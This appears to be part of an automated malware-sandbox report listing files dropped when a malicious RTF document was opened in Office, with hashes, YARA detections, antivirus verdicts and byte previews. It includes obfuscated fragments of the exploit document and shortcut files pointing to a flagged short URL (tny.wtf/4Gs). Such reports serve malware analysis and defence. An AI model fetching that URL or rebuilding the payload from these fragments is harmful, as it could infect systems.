                Preview:PSMODULECACHE............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script...............T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:data
                Category:dropped
                Size (bytes):64
                Entropy (8bit):0.34726597513537405
                Encrypted:false
                SSDEEP:3:Nlll:Nll
                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                Malicious:false
                Reputation:high, very likely benign file
                Preview:@...e...........................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Rich Text Format data, version 1
                Category:dropped
                Size (bytes):90213
                Entropy (8bit):2.7121491474431463
                Encrypted:false
                SSDEEP:768:EO7QISQv1b7zWTV5ASjZEPY/n2c5b0DdKAf:Eu9NSJEPYB5b4xf
                MD5:C076233D7617CA66CCB0466E3245D96A
                SHA1:A99E2F83E4C842269CA6A7DCBE2D6E353A0B4A69
                SHA-256:9A409238F89598ABA3F9F22A7516A32FA7AF0E815ACEAF38EB6773288BCD49F7
                SHA-512:89292E072B61824DFCB30C82B1CED7B2A711555711930DD5382737A8FFBC95131D0C862E856C90E7643E0C1169DAB5B13B1CD306A528AFD3069DC29AA4EF01B0
                Malicious:true
                Yara Hits:
                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy[1].doc, Author: ditekSHen
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Reputation:low
                Preview:{\rtf1..{\*\fldinst622249777 \+}.{\718881662>.=.3?~8`6!86???4`-.'/*6)04+%4>@.7+)9<$3.,%$7'[*0.,.4?=&-#?.`*90%=[3(,9?~(7?[<=??9.<&?'3%,?^>`5#5<~?7.?*+[?.=2'5,@38406&%@'?(?,,_.9@1~<*'`+'0???`:8/`/3;-])..<24:?`:!?.<|6$`|1)?^)_[<?0.$|?9=1?^3%>??:<@?8[0?/,:?%-?_0?',`??.%1`.::&=?]@_=)-#[-7](65!|9@+/[7/1>.72,7`8+?(?(.3`?7?~.?*1*`*6-6`&@~(/7'/(~^%)8#4`>8;*4.9)??8/?`9./?|_.0,*:.61~:1%8.`#.98-6^5:?]!&5#2@!%??`4#-:.+%=!3*=?5'[8,.)..]8?.<;&.4'?3[^==/%!$9`?;?8=%1?|!:(3_-.<(,3106^3;;)?.16?]<>6;*:%%8_.|':>.$.2[%/9.-$;@|#!/^>6%<($!%+*+~:|7_%><2=%?<~+62(?)||#:>9]~52(``07[2*;?;1?3:4.+2#;%?$???9?79??!~.*]&40..1?6;]?4^=%!18?&*2|[.>.4#._&21[/[|@@.+@.*.*9%!9$2>-!`[@@=+25+0<0?0:8@.?|<?5=%(>:%.^.$'4?4)?+4-@#_<#%>.3..5;!$;.!(?(-[5^]?6?6*-:??:52=-.6~)[?..&|/9^.46:?<<]!+|9]$6[5[]+*0?~?^]4]%~)^|.,$0,+9&^20^5)>]>;(+.93.|!,(|91<[.:?.@'81(+.&.86?;_&$:.+0]!:.'(#34#>*%?22.~)?:03#>1.0-7*0*8|<|_)^4_?$<=&&7875&=4???[%6%#][?6[?>.04!2$|.(<0!8#%2'^6?@%$]7[8+$?*`?(/?0.2-~./?(./.>954?:?.?>.+./41.9)_=@.62<~6`_$=`[0/)0?+64$?#~%
                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):415848
                Entropy (8bit):3.5938135611796738
                Encrypted:false
                SSDEEP:3072:HHGzwfkYF6hNe4VTdRnTT8w4TWQZqbT0WgR2pKKtPt2uS7Ut4QzS18f8d6bb/g5g:0wfkYFNZqP0Hd0t/
                MD5:8917F751C05D497A4F29BF454BC19F48
                SHA1:31EAE7E64E0C6062FDD6C4DB81E31A2BE2C3A000
                SHA-256:2E0E8C2013DDE6B8F98ADF7A38208C6360AFB3D4F78408D903598250D2733CEC
                SHA-512:8D3B2E2BA380B2118A5DBA00615CBCCCAED76D7DAEE84B0D82B2CE4F6B9A26B61B0D8F7F8C1A6DB90EFBE729D08D6B972B94DFE041AFCB9D9D8682FB998575F7
                Malicious:false
                Preview:..'.....'. .C.o.p.y.r.i.g.h.t. .(.c.). .M.i.c.r.o.s.o.f.t. .C.o.r.p.o.r.a.t.i.o.n... . .A.l.l. .r.i.g.h.t.s. .r.e.s.e.r.v.e.d.......'.....'. .V.B.S.c.r.i.p.t. .S.o.u.r.c.e. .F.i.l.e.....'.....'. .S.c.r.i.p.t. .N.a.m.e.:. .w.i.n.r.m...v.b.s.....'.........O.p.t.i.o.n. .E.x.p.l.i.c.i.t.........'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.....'. .E.r.r.o.r. .c.o.d.e.s.....p.r.i.v.a.t.e. .c.o.n.s.t. .E.R.R._.O.K. . . . . . . . . . . . . . .=. .0.....p.r.i.v.a.t.e. .c.o.n.s.t. .l.a.m.p.e.j.a.n.t.e. .=. .1.........'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.'.....'. .M.e.s.s.a.g.e.s.....p.r.i.v.a.t.e. .c.o.n.s.t. .L._.O.N.L.Y.C.S.C.R.I.P.T._.M.e.s.s.a.g.e. . . . . .=. .".C.a.n. .b.e. .e.x.e.c.u.t.e.d. .o.n.l.y. .b.y. .c.s.c.r.i.p.t...e.x.e...".....p.r.i.v.a.t.e. .c.o.n.s.t. .L._.U.N.K.O.P.N.M._.M.e.s.s.a.g.e. . . . . . . . . .=. .".U.n.k.n.o.w.n. .o.p.e.r.a.t.i.o.n. .n.a.m.e.:. .".....p.r.i.v.a.t.e. .c.o.n.s.t. .L._.O.P._.M.e.s.s.a.g.e. . . . . . . . . . . . . . .=. .".O.p.e.r.a.t.i.o.n. .-. .".....
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3193460
                Entropy (8bit):4.046132403996407
                Encrypted:false
                SSDEEP:12288:f1DkEf5u3lGnjOjIwIusOwvhWXKcnXfxpDZaLUkWaNYHQo1qWwh1pPD8dt3iGnji:flkqu3IwaqSW1ZwhfPat3wwKuWh1Ow9
                MD5:ABA47100B0A1B138946AD211C50A0F1A
                SHA1:2E037F3298A5089A8EDC2AB8DDEEBA65EA12020E
                SHA-256:6608F935BA21AE99EF2395C913C1613C0A5608E14FC81703E6B3540FDDC43614
                SHA-512:9F7EA84FC3D1696C8C362194702D9E11C47907C25331DCFE4C2F6349C6F9358820FAF676EC8C6FF42EB42E814A57378A6F47113EC99DD234C2D2EDF12F7808F6
                Malicious:false
                Preview:....l...........{................D...`.. EMF....t.0.....0.......................@...........................F...,... ...EMF+.@..................`...`...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...................................................#..."...........!...................................................#..."...........!...................................................#..."...........!...................................................#...'................3f.....%....................3f.....................................L...d.......R.......c.......R...........!..............?...........?................................'.......................%...........(.......................L...d...................................!..............?...........?................................'...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3040040
                Entropy (8bit):3.946724551597298
                Encrypted:false
                SSDEEP:12288:s1QePI5R32GnjPjIwcusrwvsWXKcnXfxpMZacUkRaN7Hjo1PWwMD8dt3iGnjPjIC:sqeOR30wOSKx1OwMat3wwKuWh1OwM
                MD5:1866D5DE30DB65562B4AD95083EE3FA4
                SHA1:1BCB8B7B6032C8840605D1491E89F276478999EF
                SHA-256:BF41863E76D1692AAAD5CF9538F625F3EF918B7E7071EF98675E971662827507
                SHA-512:F5FF9D880706715BAD8E98B10C6891E565F8E826F30DCFDF3644161B995EC53EC18D79FEF1DE499020DEC52D386FE26B83AE70DB0D0015640245D327FB83E596
                Malicious:false
                Preview:....l...........z...r...........QN...a.. EMF....(c......"...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s..."...........!..............................................._...s...'...............ZZZ.....%...................ZZZ.....................................L...d...............p...............q...!..............?...........?................................'...............2.......%...........(...................2...L...d.......p...............p.......
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):3192228
                Entropy (8bit):4.049949730098601
                Encrypted:false
                SSDEEP:12288:T1ucJ+5734Gnj5jIwYusdwv+WXKcnXfxpaZauUknaNpHpo1tWw81Z4D8dt3iGnjE:TIcu73wwKKO31sw8b4at3wwKuWh1OwD
                MD5:6DED7DD02610506AA9AD1A99D82142B9
                SHA1:513B4CDA5326C772F0EE9D501FF4D87A22CC423B
                SHA-256:DEFD7E9344FF2B1538FE597EC105C3892890997E7769A0BA0D5FF4EE3BEB2829
                SHA-512:42A65593A70BEE68A6636F5D4E0D86ABB32B260D792811E9DEF4D9A5BAA3B4CF7EF18B6F284C2BEB262B8A6A5F05FC3398C96A445BEA9F336B0F8DAB9B20EFA5
                Malicious:false
                Preview:....l...........z...............!?..3X.. EMF......0.....0...................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!......................................................."...........!......................................................."...........!......................................................."...........!.......................................................'................3f.....%....................3f.....................................L...d...4...f...7...{...4...f...........!..............?...........?................................'.......................%...........(.......................L...d...............................$...!..............?...........?................................'...
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                Category:dropped
                Size (bytes):42352
                Entropy (8bit):3.115670038061612
                Encrypted:false
                SSDEEP:384:x5H68srcOQd1vzssDDc60dghR4IdQtgpgRM:x5sQd1Ys/cahtCt8x
                MD5:8EA539501F8281777CD31C045F4C9C15
                SHA1:677DF5F4CA2A0BE8E6428C5FC11EAEFFA7DEFD0B
                SHA-256:F1146B9DA5645867D50D2BCEE857C056261E46A6A155E09299E2B8CBE86A40BE
                SHA-512:ED1A2683E1F597B6CA1F61242C7527B0D97527F614E897750364E31A245B0A95C7AFA41B220DFEEB5E57E42C5A4B4DCBC95F6A6291385686A22FA4CBB4217AB3
                Malicious:false
                Preview:....l...........;...............~@..xW.. EMF....p...........................j.......................{.......F...,... ...EMF+.@..................X...X...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..............................................<.......%...........%.......................R...p................................@..T.i.m.e.s. .N.e.w. .R.o.m.a.n.......................................................................z7^c$.............0.......0.......0............. .........0.......0.......0.....G................*..Ax...N..............T.i.m.e.s. .N.e.w. .R.o...F.....6...............@.0.................................................dv......%...........%...........%.......................T...T...........+...q........i.@...@....Z.......L...............<.......P... ...,...............T.......,...........q........i.@...@,...Z.......L...............<...........1.8.8.8.1.6.6.2.>...=...3.?.~.8.`.6.!.8.6.?.?.?.4.`.2...2...2...2...2...2...2...2...8...
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Rich Text Format data, version 1
                Category:dropped
                Size (bytes):90213
                Entropy (8bit):2.7121491474431463
                Encrypted:false
                SSDEEP:768:EO7QISQv1b7zWTV5ASjZEPY/n2c5b0DdKAf:Eu9NSJEPYB5b4xf
                MD5:C076233D7617CA66CCB0466E3245D96A
                SHA1:A99E2F83E4C842269CA6A7DCBE2D6E353A0B4A69
                SHA-256:9A409238F89598ABA3F9F22A7516A32FA7AF0E815ACEAF38EB6773288BCD49F7
                SHA-512:89292E072B61824DFCB30C82B1CED7B2A711555711930DD5382737A8FFBC95131D0C862E856C90E7643E0C1169DAB5B13B1CD306A528AFD3069DC29AA4EF01B0
                Malicious:true
                Yara Hits:
                • Rule: INDICATOR_RTF_MalVer_Objects, Description: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents., Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C63FEFCD.doc, Author: ditekSHen
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Preview:{\rtf1..{\*\fldinst622249777 \+}.{\718881662>.=.3?~8`6!86???4`-.'/*6)04+%4>@.7+)9<$3.,%$7'[*0.,.4?=&-#?.`*90%=[3(,9?~(7?[<=??9.<&?'3%,?^>`5#5<~?7.?*+[?.=2'5,@38406&%@'?(?,,_.9@1~<*'`+'0???`:8/`/3;-])..<24:?`:!?.<|6$`|1)?^)_[<?0.$|?9=1?^3%>??:<@?8[0?/,:?%-?_0?',`??.%1`.::&=?]@_=)-#[-7](65!|9@+/[7/1>.72,7`8+?(?(.3`?7?~.?*1*`*6-6`&@~(/7'/(~^%)8#4`>8;*4.9)??8/?`9./?|_.0,*:.61~:1%8.`#.98-6^5:?]!&5#2@!%??`4#-:.+%=!3*=?5'[8,.)..]8?.<;&.4'?3[^==/%!$9`?;?8=%1?|!:(3_-.<(,3106^3;;)?.16?]<>6;*:%%8_.|':>.$.2[%/9.-$;@|#!/^>6%<($!%+*+~:|7_%><2=%?<~+62(?)||#:>9]~52(``07[2*;?;1?3:4.+2#;%?$???9?79??!~.*]&40..1?6;]?4^=%!18?&*2|[.>.4#._&21[/[|@@.+@.*.*9%!9$2>-!`[@@=+25+0<0?0:8@.?|<?5=%(>:%.^.$'4?4)?+4-@#_<#%>.3..5;!$;.!(?(-[5^]?6?6*-:??:52=-.6~)[?..&|/9^.46:?<<]!+|9]$6[5[]+*0?~?^]4]%~)^|.,$0,+9&^20^5)>]>;(+.93.|!,(|91<[.:?.@'81(+.&.86?;_&$:.+0]!:.'(#34#>*%?22.~)?:03#>1.0-7*0*8|<|_)^4_?$<=&&7875&=4???[%6%#][?6[?>.04!2$|.(<0!8#%2'^6?@%$]7[8+$?*`?(/?0.2-~./?(./.>954?:?.?>.+./41.9)_=@.62<~6`_$=`[0/)0?+64$?#~%
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):15872
                Entropy (8bit):5.699346730145622
                Encrypted:false
                SSDEEP:192:39Prbu6x/17WPwbuqb171PDwbuq/171Pwguq/171Pwbnvq/17:NPry6N1SPwyu1ZPEy+1ZPwB+1ZPwT+1
                MD5:DE743D8309BCE30D9C302D0DCCAAC141
                SHA1:22DCC3408E5C3D6346D2D68FA3014F47399E8CAD
                SHA-256:81EE38A778B69888C7662585A1891713E203C00437F8928D28EDB0F352598124
                SHA-512:5EDA0E1FF21FD4E7D95BBABC82707394DD5743F72C34066ED057A988433F3506DAC4694EC1252832F5A31D699CFD212236F8BFDBFAAEC25D7991A6F89FBD95C7
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):1024
                Entropy (8bit):0.05390218305374581
                Encrypted:false
                SSDEEP:3:ol3lYdn:4Wn
                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):13312
                Entropy (8bit):3.565279302923872
                Encrypted:false
                SSDEEP:192:6F/8J1fZqAAR6tfTzPqs19SBx1wMQtYFQopHduuDPqgtiuS+oYBHSFkCa+bCChVa:5m76tfTzSs1WzwjNopbib+VBvnRKV1PI
                MD5:BE57F89FE5BB70729955389D4562F8DC
                SHA1:3154694500114C351E1C5A2B74A04BDE0F1D7B93
                SHA-256:4F52458A93B91846F47FD66E1312A7B0FD85F75C917E94709C1592890AF5BD4F
                SHA-512:DE7AF62B33F4C2FDCAFAAAEC6D49EA8FBA67A09C1584CA4E11C9515CE4E210496690CD41065AB682E38DFAB60086E96524A04FBAFB84353C88BC450D7B5FC40D
                Malicious:false
                Preview:..1.8.8.8.1.6.6.2.>...=...3.?.~.8.`.6.!.8.6.?.?.?.4.`.-...'./.*.6.).0.4.+.%.4.>.@...7.+.).9.<.$.3...,.%.$.7.'.[.*.0...,...4.?.=.&.-.#.?...`.*.9.0.%.=.[.3.(.,.9.?.~.(.7.?.[.<.=.?.?.9...<.&.?.'.3.%.,.?.^.>.`.5.#.5.<.~.?.7...?.*.+.[.?...=.2.'.5.,.@.3.8.4.0.6.&.%.@.'.?.(.?.,.,._...9.@.1.~.<.*.'.`.+.'.0.?.?.?.`.:.8./.`./.3.;.-.].).....<.2.4.:.?.`.:.!.?...<.|.6.$.`.|.1.).?.^.)._.[.<.?.0...$.|.?.9.=.1.?.^.3.%.>.?.?.:.<.@.?.8.[.0.?./.,.:.?.%.-.?._.0.?.'.,.`.?.?...%.1.`...:.:.&.=.?.].@._.=.).-.#.[.-.7.].(.6.5.!.|.9.@.+./.[.7./.1.>...7.2.,.7.`.8.+.?.(.?.(...3.`.?.7.?.~...?.*.1.*.`.*.6.-.6.`.&.@.~.(./.7.'./.(.~.^.%.).8.#.4.`.>.8.;.*.4...9.).?.?.8./.?.`.9.../.?.|._...0.,.*.:...6.1.~.:.1.%.8...`.#...9.8.-.6.^.5.:.?.].!.&.5.#.2.@.!.%.?.?.`.4.#.-.:...+.%.=.!.3.*.=.?.5.'.[.8.,...).....].8.?...<.;.&...4.'.?.3.[.^.=.=./.%.!.$.9.`.?.;.?.8.=.%.1.?.|.!.:.(.3._.-...<.(.,.3.1.0.6.^.3.;.;.).?...1.6.?.].<.>.6.;.*.:.%.%.8._...|.'.:.>...$...2.[.%./.9...-.$.;.@.|.#.!./.^.>.6.%.<.(.$.!.%.+.*.+.~.:.|.7._.%.>.<.2.=.
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                File Type:very short file (no magic)
                Category:dropped
                Size (bytes):1
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3:U:U
                MD5:C4CA4238A0B923820DCC509A6F75849B
                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                Malicious:false
                Preview:1
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.0255371792752877
                Encrypted:false
                SSDEEP:6:I3DPcNjNp3avxggLRdbNdAgnRXv//4tfnRujlw//+GtluJ/eRuj:I3DPsNFcJrAghvYg3J/
                MD5:A2988C9BB513879F0EDF037D4461E5C8
                SHA1:8D0B9049E1330C4700CD4FBEA6FCF8F602D81D64
                SHA-256:2DBCCFDFC42FEF69E08EBB630D0459A0A27831A7AA5E867891B464C1F6AD4B60
                SHA-512:0B3E983BDD91FE63DF1CAD8BC9EC3EB222E21F3A51D2E3F5FE8A3AC57D1AF5767F7A018043FE773138B398E204000882313DAA9548A4AEC58440A30DEAEC2648
                Malicious:false
                Preview:......M.eFy...z.....h.M.....O.lS,...X.F...Fa.q............................_....=.M..,6...M.............ME.G|4..t......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):131072
                Entropy (8bit):0.02565405508720011
                Encrypted:false
                SSDEEP:6:I3DPcfEFvxggLRpwZgiLGRXv//4tfnRujlw//+GtluJ/eRuj:I3DPkMufqvYg3J/
                MD5:ECE0DF009049350F8D07DCE691CE2FA5
                SHA1:C24A606C32BC87144D434B3FCDE2D82C2CB55646
                SHA-256:F6CE0BDB4C3CD32152F443B1471C3954985DE19BC341B90143FA1A6A1CF1C7E6
                SHA-512:92B96E5BB87D282245D4936ED65D3D355ACA4BC4A1155D6E736138A805A19089D4BB05205001BCDA334E2DFC1E6445443E03706D3A450D1B6F624E34A61B9A8A
                Malicious:false
                Preview:......M.eFy...z..3$.83H....n._YS,...X.F...Fa.q............................>.*...KB......o..........a...XL....ouH......................................................................x...x...x...x...............................................................................................................................................................................................................................................................................................................................zV.......... ..@...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):512
                Entropy (8bit):0.0
                Encrypted:false
                SSDEEP:3::
                MD5:BF619EAC0CDF3F68D496EA9344137E8B
                SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                Malicious:false
                Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:data
                Category:dropped
                Size (bytes):548864
                Entropy (8bit):7.870478073083046
                Encrypted:false
                SSDEEP:12288:wthMS5lPewKui0iPg8kk7BwUC3QLfGAj+Km:i2S7Pe4a7uUC3QLO5Km
                MD5:207854F1B7B812335E52417F73F23B0E
                SHA1:39EE35C6BD1A1852263FFB167D4AEAC457A8BB84
                SHA-256:F8973DF8841180FA072D3FF74635CE15A24EE90FE508ED9096E6485084811E94
                SHA-512:21F103BB986C1960796E49A62C0048D3992F4777B0CDD2197EF1BE04ABC99009A73F59DB9B436F9B359FE8379155FDBCEE0A40C90D16AFD4B7456992D3C7AF41
                Malicious:false
                Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                File Type:Composite Document File V2 Document, Cannot read section info
                Category:dropped
                Size (bytes):542720
                Entropy (8bit):7.926863820625562
                Encrypted:false
                SSDEEP:12288:IthMS5lPewKui0iPg8kk7BwUC3QLfGAj+Km:q2S7Pe4a7uUC3QLO5Km
                MD5:F270ABF26D2DBCB3000FAD3DD103ABE6
                SHA1:3A40ABEEE65C1584496E902442FFE4A975B82A56
                SHA-256:9D9254ED092BFA4DB583575842FD03FF14366746152E9DD55512FCDC3C446F24
                SHA-512:9745FEBEA2B1600C346556CDCBB45DEE442F829DEE993BE1753FA56BC6282D459652C8A749720E1DC2EC802B2A96D4476802E3E26F2C1CC9BA4CF748CE01DF03
                Malicious:false
                Preview:......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/4Gs>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):44
                Entropy (8bit):4.470573095811685
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/3LcmWE3:HRYFVm/3LOq
                MD5:EA2E675697CA592E50BFFE355A59B731
                SHA1:BC67AEBDE062C7565AD5B16BE514E63FD635F517
                SHA-256:7F669212335BAE30E6B1ABBC6AFC8CAFD60932468C0F9DCEE0384FDC7DCBB16C
                SHA-512:AF6CBD4BEE1C5621EAD63AE9ED5024319D6C97D0919F8EB7FCEBBCE813B9FBC466BF57BED96E0A757F4D71137CF3C2F2123FCE30C7A1F71DE15FFAECC595BC11
                Malicious:true
                Preview:[InternetShortcut]..URL=http://tny.wtf/4Gs..
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:Generic INItialization configuration [xls]
                Category:modified
                Size (bytes):60
                Entropy (8bit):4.371241170818224
                Encrypted:false
                SSDEEP:3:bD3WcLOQvUYCmMTBCv:bzbDOT2
                MD5:99FDB30E4CE37C2619E4F937EAD249C3
                SHA1:A0456195E67E9CFCB5793E8FDD1D3CEB13E5165A
                SHA-256:A74EE273542641C24F46CDE4F1E13AD7BF827533DCEC544A6DF61AA67376D961
                SHA-512:D1D11CA9FD7C273E0D832C3010292C8D9DBECA5F055D694DE116DD803D05715B33FF60C7B59E891C0AB0779C6F76D4F2D60CF3CCFF9AA719C3CFDB59D7D1FE84
                Malicious:false
                Preview:[folders]..4Gs.url=0..tny.wtf.url=0...LNK=0..[xls]...LNK=0..
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:MS Windows 95 Internet shortcut text (URL=<http://tny.wtf/>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):41
                Entropy (8bit):4.2963379801223045
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/3LcmWy:HRYFVm/3LOy
                MD5:D591A53347F94FBC48B4B6A5CCE920ED
                SHA1:C00082566F3211F9B1BBEC933A8AE164759C290A
                SHA-256:1CA93696A94797C9411318830CAC6A5B26FEACC37D5CAA4B3742D722CD073781
                SHA-512:BA14258049ABCC3E31AA3DFC3ABBC2949AF30BB73B031C0E408BCF036B51B7AC11E32C3B39A7952E1A007179720C970B29CB2DF8EF03A021EF3B59FEB5AE177E
                Malicious:true
                Preview:[InternetShortcut]..URL=http://tny.wtf/..
                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                File Type:data
                Category:dropped
                Size (bytes):162
                Entropy (8bit):2.503835550707525
                Encrypted:false
                SSDEEP:3:vrJlaCkWtVypil69oycWjUbtFJlln:vdsCkWtTl69oyjUvl
                MD5:CB3D0F9D3F7204AF5670A294AB575B37
                SHA1:5E792DFBAD5EDA9305FCF8F671F385130BB967D8
                SHA-256:45968B9F50A9B4183FBF4987A106AB52EB3EF3279B2118F9AB01BA837DC3968A
